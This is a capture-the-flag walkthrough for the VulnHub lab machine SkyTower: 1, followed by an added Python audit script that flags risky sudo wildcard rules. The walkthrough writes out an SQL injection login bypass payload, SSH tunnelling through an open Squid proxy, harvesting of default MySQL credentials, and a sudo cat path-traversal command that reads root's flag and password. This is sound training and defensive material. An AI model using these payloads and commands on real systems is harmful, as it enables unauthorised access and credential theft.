SkyTower: 1
SkyTower: 1, made by Telspace. Download & walkthrough links are available.
www.vulnhub.com
Nmap
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Apache httpd 2.2.22 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Site doesn't have a title (text/html).
3128/tcp open http-proxy Squid http proxy 3.1.20
|_http-server-header: squid/3.1.20
|_http-title: ERROR: The requested URL could not be retrieved
MAC Address: 08:00:27:54:4A:37 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.10, Linux 3.2 - 3.16
Uptime guess: 198.838 days (since Tue Mar 19 16:24:36 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: All zeros
TRACEROUTE
HOP RTT ADDRESS
1 0.31 ms 10.0.0.13
Port 80 serves a login page, which we bypass with an SQL injection payload (' || 1=1#).
After the bypass, the page shows the password for the user john.

With these credentials we can log in over SSH.
The SSH port is not open to us, but the proxy port is, so we used it as follows:
* edited /etc/proxychains.conf
http 10.0.0.13 3128
# add this line at the end
* usage of the proxy
proxychains ssh john@10.0.0.13
and enter the password for john
But once we connect over SSH the connection drops, because .bashrc does not let us stay logged in, so we tried another way to get a proper interactive shell:
proxychains ssh john@10.0.0.13 "/bin/bash"
This gives us a bash shell, and the connection no longer drops.
For post-exploitation enumeration we ran LinEnum.sh and found that MySQL uses the default credentials root:root, which gave us the credentials of all users in the SkyTech database. When we log in as sara, we see that sara is a sudo user:
sara@SkyTower:/tmp$ sudo -l
Matching Defaults entries for sara on this host:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User sara may run the following commands on this host:
(root) NOPASSWD: /bin/cat /accounts/*, (root) /bin/ls /accounts/*
So sara has sudo rights for the cat command on paths under the /accounts directory. Because the rule ends in a wildcard, a path containing ../ still matches it, so we cat the root flag using:
sara@SkyTower:/tmp$ sudo /bin/cat /accounts/../../../root/flag.txt
Congratz, have a cold one to celebrate!
root password is theskytower
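The sudo rule above, seen from the auditing side, as an added example that is not part of the original walkthrough: it flags entries whose wildcard argument still matches after a ../ sequence. The function names, the third (tightened) rule and the use of Python's fnmatch as a model of sudo's argument matching are assumptions of this example.

```python
import fnmatch
import posixpath
import re

# Constructed sample: the two entries from the sudo -l output above, one per
# line, plus a hypothetical tightened rule that names a single literal file.
SAMPLE_RULES = [
    "(root) NOPASSWD: /bin/cat /accounts/*",
    "(root) /bin/ls /accounts/*",
    "(root) /bin/cat /accounts/report.txt",
]
RULE_RE = re.compile(r"^\(([^)]*)\)\s+(?:([A-Z]+):\s+)?(\S+)\s*(.*)$")

def parse_rule(line):
    """Split one sudo -l entry into (runas, tag, command, argument pattern)."""
    m = RULE_RE.match(line.strip())
    if not m:
        raise ValueError(f"unrecognised rule: {line!r}")
    return m.groups()

def args_allowed(pattern, args):
    """Model of sudoers argument matching (an assumption of this example):
    the arguments are matched as one string and '*' also matches '/'."""
    return fnmatch.fnmatchcase(args, pattern)

def escapes_base(pattern, args):
    """True if args match the rule but normalise to a path outside the
    directory prefix that precedes the first wildcard."""
    base = pattern.split("*", 1)[0].rstrip("/") or "/"
    resolved = posixpath.normpath(args)
    inside = base == "/" or resolved == base or resolved.startswith(base + "/")
    return args_allowed(pattern, args) and not inside

def audit(rules, probe_suffix="../../../root/flag.txt"):
    """Return (command, pattern, resolved path) for each wildcard rule that
    accepts the '..' path used in the walkthrough."""
    findings = []
    for line in rules:
        _runas, _tag, cmd, pattern = parse_rule(line)
        if "*" not in pattern:
            continue  # literal arguments cannot be widened by the caller
        probe = pattern.split("*", 1)[0] + probe_suffix
        if escapes_base(pattern, probe):
            findings.append((cmd, pattern, posixpath.normpath(probe)))
    return findings

if __name__ == "__main__":
    for cmd, pattern, resolved in audit(SAMPLE_RULES):
        print(f"RISKY: {cmd} {pattern} also permits {resolved}")
```

A rule flagged here is better replaced by literal file names, or by a root-owned wrapper script that resolves the requested path and checks that it stays under /accounts before reading it.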
This gives us the root credentials for SSH, so we again used proxychains to SSH in as root:
proxychains ssh root@10.0.0.13 "/bin/bash"
We used /bin/bash because .bashrc does not let us stay connected: the shell closes as soon as we connect.
Hence got the root 👍
……………………………….COWABUNGA…………………………………